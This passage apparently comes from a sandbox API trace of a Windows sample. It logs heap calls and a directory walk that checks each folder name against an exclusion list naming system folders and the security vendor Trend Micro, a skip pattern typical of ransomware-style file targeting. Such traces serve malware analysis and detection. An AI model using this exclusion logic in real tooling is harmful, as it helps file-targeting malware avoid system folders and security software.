[0140.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec1b8 [0140.353] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0140.353] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebccd8 | out: hHeap=0xea0000) returned 1 [0140.353] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf18 | out: hHeap=0xea0000) returned 1 [0140.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf18 [0140.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0140.353] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.353] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0140.353] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0140.353] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0140.353] StrStrIW (lpFirst="Crypto", lpSrch="tmp") returned 0x0 [0140.353] StrStrIW (lpFirst="Crypto", lpSrch="winnt") returned 0x0 [0140.354] StrStrIW (lpFirst="Crypto", lpSrch="temp") returned 0x0 [0140.354] StrStrIW (lpFirst="Crypto", lpSrch="thumb") returned 0x0 [0140.354] StrStrIW (lpFirst="Crypto", lpSrch="$Recycle.Bin") returned 0x0 [0140.354] StrStrIW (lpFirst="Crypto", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.354] StrStrIW (lpFirst="Crypto", lpSrch="System Volume Information") returned 0x0 [0140.354] StrStrIW (lpFirst="Crypto", lpSrch="Boot") returned 0x0 [0140.354] StrStrIW (lpFirst="Crypto", lpSrch="Windows") returned 0x0 [0140.354] StrStrIW (lpFirst="Crypto", lpSrch="Trend Micro") returned 0x0 [0140.354] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebccd8 [0140.354] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0140.354] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebccd8 | out: hHeap=0xea0000) returned 1 [0140.354] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed0f8 [0140.354] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebccd8 [0140.354] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0140.354] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0140.354] lstrcmpW (lpString1="Device Stage", lpString2=".") returned 1 [0140.354] lstrcmpW (lpString1="Device Stage", lpString2="..") returned 1 [0140.354] StrStrIW (lpFirst="Device Stage", lpSrch="tmp") returned 0x0 [0140.354] StrStrIW (lpFirst="Device Stage", lpSrch="winnt") returned 0x0 [0140.354] StrStrIW (lpFirst="Device Stage", lpSrch="temp") returned 0x0 [0140.354] StrStrIW (lpFirst="Device Stage", lpSrch="thumb") returned 0x0 [0140.354] StrStrIW (lpFirst="Device Stage", lpSrch="$Recycle.Bin") returned 0x0 [0140.354] StrStrIW (lpFirst="Device Stage", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.354] StrStrIW (lpFirst="Device Stage", lpSrch="System Volume Information") returned 0x0 [0140.355] StrStrIW (lpFirst="Device Stage", lpSrch="Boot") returned 0x0 [0140.355] StrStrIW (lpFirst="Device Stage", lpSrch="Windows") returned 0x0 [0140.355] StrStrIW (lpFirst="Device Stage", lpSrch="Trend Micro") returned 0x0 [0140.355] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed0d0 [0140.355] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0140.355] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0140.355] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec1b8 [0140.355] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0140.355] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0140.355] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed0d0 | out: hHeap=0xea0000) returned 1 [0140.355] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed0d0 [0140.355] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b00 [0140.355] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.355] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0140.355] lstrcmpW (lpString1="DeviceSync", lpString2=".") returned 1 [0140.355] lstrcmpW (lpString1="DeviceSync", lpString2="..") returned 1 [0140.355] StrStrIW (lpFirst="DeviceSync", lpSrch="tmp") returned 0x0 [0140.355] StrStrIW (lpFirst="DeviceSync", lpSrch="winnt") returned 0x0 [0140.355] StrStrIW (lpFirst="DeviceSync", lpSrch="temp") returned 0x0 [0140.355] StrStrIW (lpFirst="DeviceSync", lpSrch="thumb") returned 0x0 [0140.355] StrStrIW (lpFirst="DeviceSync", lpSrch="$Recycle.Bin") returned 0x0 [0140.355] StrStrIW (lpFirst="DeviceSync", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.355] StrStrIW (lpFirst="DeviceSync", lpSrch="System Volume Information") returned 0x0 [0140.355] StrStrIW (lpFirst="DeviceSync", lpSrch="Boot") returned 0x0 [0140.355] StrStrIW (lpFirst="DeviceSync", lpSrch="Windows") returned 0x0 [0140.355] StrStrIW (lpFirst="DeviceSync", lpSrch="Trend Micro") returned 0x0 [0140.355] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed008 [0140.356] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0140.356] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0140.356] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec1b8 [0140.356] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0140.356] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0140.356] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed008 | out: hHeap=0xea0000) returned 1 [0140.356] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed008 [0140.356] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0140.356] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.356] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DRM", cAlternateFileName="")) returned 1 [0140.356] lstrcmpW (lpString1="DRM", lpString2=".") returned 1 [0140.356] lstrcmpW (lpString1="DRM", lpString2="..") returned 1 [0140.356] StrStrIW (lpFirst="DRM", lpSrch="tmp") returned 0x0 [0140.356] StrStrIW (lpFirst="DRM", lpSrch="winnt") returned 0x0 [0140.356] StrStrIW (lpFirst="DRM", lpSrch="temp") returned 0x0 [0140.357] StrStrIW (lpFirst="DRM", lpSrch="thumb") returned 0x0 [0140.357] StrStrIW (lpFirst="DRM", lpSrch="$Recycle.Bin") returned 0x0 [0140.357] StrStrIW (lpFirst="DRM", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.357] StrStrIW (lpFirst="DRM", lpSrch="System Volume Information") returned 0x0 [0140.357] StrStrIW (lpFirst="DRM", lpSrch="Boot") returned 0x0 [0140.357] StrStrIW (lpFirst="DRM", lpSrch="Windows") returned 0x0 [0140.357] StrStrIW (lpFirst="DRM", lpSrch="Trend Micro") returned 0x0 [0140.357] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0140.357] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0140.357] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0140.357] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf90 [0140.357] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0140.357] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0140.357] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eHome", cAlternateFileName="")) returned 1 [0140.357] lstrcmpW (lpString1="eHome", lpString2=".") returned 1 [0140.357] lstrcmpW (lpString1="eHome", lpString2="..") returned 1 [0140.357] StrStrIW (lpFirst="eHome", lpSrch="tmp") returned 0x0 [0140.358] StrStrIW (lpFirst="eHome", lpSrch="winnt") returned 0x0 [0140.358] StrStrIW (lpFirst="eHome", lpSrch="temp") returned 0x0 [0140.358] StrStrIW (lpFirst="eHome", lpSrch="thumb") returned 0x0 [0140.358] StrStrIW (lpFirst="eHome", lpSrch="$Recycle.Bin") returned 0x0 [0140.358] StrStrIW (lpFirst="eHome", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.358] StrStrIW (lpFirst="eHome", lpSrch="System Volume Information") returned 0x0 [0140.358] StrStrIW (lpFirst="eHome", lpSrch="Boot") returned 0x0 [0140.358] StrStrIW (lpFirst="eHome", lpSrch="Windows") returned 0x0 [0140.358] StrStrIW (lpFirst="eHome", lpSrch="Trend Micro") returned 0x0 [0140.358] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0140.358] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0140.358] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0140.358] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecec8 [0140.358] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0140.358] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0140.358] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0140.358] lstrcmpW (lpString1="Event Viewer", lpString2=".") returned 1 [0140.359] lstrcmpW (lpString1="Event Viewer", lpString2="..") returned 1 [0140.359] StrStrIW (lpFirst="Event Viewer", lpSrch="tmp") returned 0x0 [0140.359] StrStrIW (lpFirst="Event Viewer", lpSrch="winnt") returned 0x0 [0140.359] StrStrIW (lpFirst="Event Viewer", lpSrch="temp") returned 0x0 [0140.359] StrStrIW (lpFirst="Event Viewer", lpSrch="thumb") returned 0x0 [0140.359] StrStrIW (lpFirst="Event Viewer", lpSrch="$Recycle.Bin") returned 0x0 [0140.359] StrStrIW (lpFirst="Event Viewer", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.359] StrStrIW (lpFirst="Event Viewer", lpSrch="System Volume Information") returned 0x0 [0140.359] StrStrIW (lpFirst="Event Viewer", lpSrch="Boot") returned 0x0 [0140.359] StrStrIW (lpFirst="Event Viewer", lpSrch="Windows") returned 0x0 [0140.359] StrStrIW (lpFirst="Event Viewer", lpSrch="Trend Micro") returned 0x0 [0140.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed148 [0140.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0140.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0140.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec1b8 [0140.359] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0140.359] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0140.360] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed148 | out: hHeap=0xea0000) returned 1 [0140.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed148 [0140.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b58 [0140.360] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.360] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0140.360] lstrcmpW (lpString1="IdentityCRL", lpString2=".") returned 1 [0140.360] lstrcmpW (lpString1="IdentityCRL", lpString2="..") returned 1 [0140.360] StrStrIW (lpFirst="IdentityCRL", lpSrch="tmp") returned 0x0 [0140.360] StrStrIW (lpFirst="IdentityCRL", lpSrch="winnt") returned 0x0 [0140.360] StrStrIW (lpFirst="IdentityCRL", lpSrch="temp") returned 0x0 [0140.360] StrStrIW (lpFirst="IdentityCRL", lpSrch="thumb") returned 0x0 [0140.360] StrStrIW (lpFirst="IdentityCRL", lpSrch="$Recycle.Bin") returned 0x0 [0140.360] StrStrIW (lpFirst="IdentityCRL", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.360] StrStrIW (lpFirst="IdentityCRL", lpSrch="System Volume Information") returned 0x0 [0140.360] StrStrIW (lpFirst="IdentityCRL", lpSrch="Boot") returned 0x0 [0140.360] StrStrIW (lpFirst="IdentityCRL", lpSrch="Windows") returned 0x0 [0140.360] StrStrIW (lpFirst="IdentityCRL", lpSrch="Trend Micro") returned 0x0 [0140.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed170 [0140.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0140.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0140.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec1b8 [0140.360] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0140.360] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0140.360] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed170 | out: hHeap=0xea0000) returned 1 [0140.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed170 [0140.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0140.360] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.360] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0140.361] lstrcmpW (lpString1="Media Player", lpString2=".") returned 1 [0140.361] lstrcmpW (lpString1="Media Player", lpString2="..") returned 1 [0140.361] StrStrIW (lpFirst="Media Player", lpSrch="tmp") returned 0x0 [0140.361] StrStrIW (lpFirst="Media Player", lpSrch="winnt") returned 0x0 [0140.361] StrStrIW (lpFirst="Media Player", lpSrch="temp") returned 0x0 [0140.361] StrStrIW (lpFirst="Media Player", lpSrch="thumb") returned 0x0 [0140.361] StrStrIW (lpFirst="Media Player", lpSrch="$Recycle.Bin") returned 0x0 [0140.361] StrStrIW (lpFirst="Media Player", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.361] StrStrIW (lpFirst="Media Player", lpSrch="System Volume Information") returned 0x0 [0140.361] StrStrIW (lpFirst="Media Player", lpSrch="Boot") returned 0x0 [0140.361] StrStrIW (lpFirst="Media Player", lpSrch="Windows") returned 0x0 [0140.361] StrStrIW (lpFirst="Media Player", lpSrch="Trend Micro") returned 0x0 [0140.361] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed198 [0140.361] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0140.361] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0140.361] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec1b8 [0140.361] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0140.361] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0140.361] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed198 | out: hHeap=0xea0000) returned 1 [0140.361] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed198 [0140.361] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0140.361] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.361] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MF", cAlternateFileName="")) returned 1 [0140.361] lstrcmpW (lpString1="MF", lpString2=".") returned 1 [0140.361] lstrcmpW (lpString1="MF", lpString2="..") returned 1 [0140.361] StrStrIW (lpFirst="MF", lpSrch="tmp") returned 0x0 [0140.361] StrStrIW (lpFirst="MF", lpSrch="winnt") returned 0x0 [0140.362] StrStrIW (lpFirst="MF", lpSrch="temp") returned 0x0 [0140.362] StrStrIW (lpFirst="MF", lpSrch="thumb") returned 0x0 [0140.362] StrStrIW (lpFirst="MF", lpSrch="$Recycle.Bin") returned 0x0 [0140.362] StrStrIW (lpFirst="MF", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.362] StrStrIW (lpFirst="MF", lpSrch="System Volume Information") returned 0x0 [0140.362] StrStrIW (lpFirst="MF", lpSrch="Boot") returned 0x0 [0140.362] StrStrIW (lpFirst="MF", lpSrch="Windows") returned 0x0 [0140.362] StrStrIW (lpFirst="MF", lpSrch="Trend Micro") returned 0x0 [0140.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0140.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0140.362] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0140.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed1c0 [0140.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0140.362] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0140.362] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSDN", cAlternateFileName="")) returned 1 [0140.362] lstrcmpW (lpString1="MSDN", lpString2=".") returned 1 [0140.362] lstrcmpW (lpString1="MSDN", lpString2="..") returned 1 [0140.362] StrStrIW (lpFirst="MSDN", lpSrch="tmp") returned 0x0 [0140.362] StrStrIW (lpFirst="MSDN", lpSrch="winnt") returned 0x0 [0140.362] StrStrIW (lpFirst="MSDN", lpSrch="temp") returned 0x0 [0140.362] StrStrIW (lpFirst="MSDN", lpSrch="thumb") returned 0x0 [0140.362] StrStrIW (lpFirst="MSDN", lpSrch="$Recycle.Bin") returned 0x0 [0140.362] StrStrIW (lpFirst="MSDN", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.362] StrStrIW (lpFirst="MSDN", lpSrch="System Volume Information") returned 0x0 [0140.362] StrStrIW (lpFirst="MSDN", lpSrch="Boot") returned 0x0 [0140.362] StrStrIW (lpFirst="MSDN", lpSrch="Windows") returned 0x0 [0140.362] StrStrIW (lpFirst="MSDN", lpSrch="Trend Micro") returned 0x0 [0140.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0140.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef14e8 [0140.363] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0140.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed1e8 [0140.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0140.363] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef14e8 | out: hHeap=0xea0000) returned 1 [0140.363] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0140.363] lstrcmpW (lpString1="NetFramework", lpString2=".") returned 1 [0140.363] lstrcmpW (lpString1="NetFramework", lpString2="..") returned 1 [0140.363] StrStrIW (lpFirst="NetFramework", lpSrch="tmp") returned 0x0 [0140.363] StrStrIW (lpFirst="NetFramework", lpSrch="winnt") returned 0x0 [0140.363] StrStrIW (lpFirst="NetFramework", lpSrch="temp") returned 0x0 [0140.363] StrStrIW (lpFirst="NetFramework", lpSrch="thumb") returned 0x0 [0140.363] StrStrIW (lpFirst="NetFramework", lpSrch="$Recycle.Bin") returned 0x0 [0140.363] StrStrIW (lpFirst="NetFramework", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.363] StrStrIW (lpFirst="NetFramework", lpSrch="System Volume Information") returned 0x0 [0140.363] StrStrIW (lpFirst="NetFramework", lpSrch="Boot") returned 0x0 [0140.363] StrStrIW (lpFirst="NetFramework", lpSrch="Windows") returned 0x0 [0140.363] StrStrIW (lpFirst="NetFramework", lpSrch="Trend Micro") returned 0x0 [0140.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed210 [0140.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef14e8 [0140.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1530 [0140.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec1b8 [0140.363] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1530 | out: hHeap=0xea0000) returned 1 [0140.363] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef14e8 | out: hHeap=0xea0000) returned 1 [0140.363] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed210 | out: hHeap=0xea0000) returned 1 [0140.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed210 [0140.364] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d10 [0140.364] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.364] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: 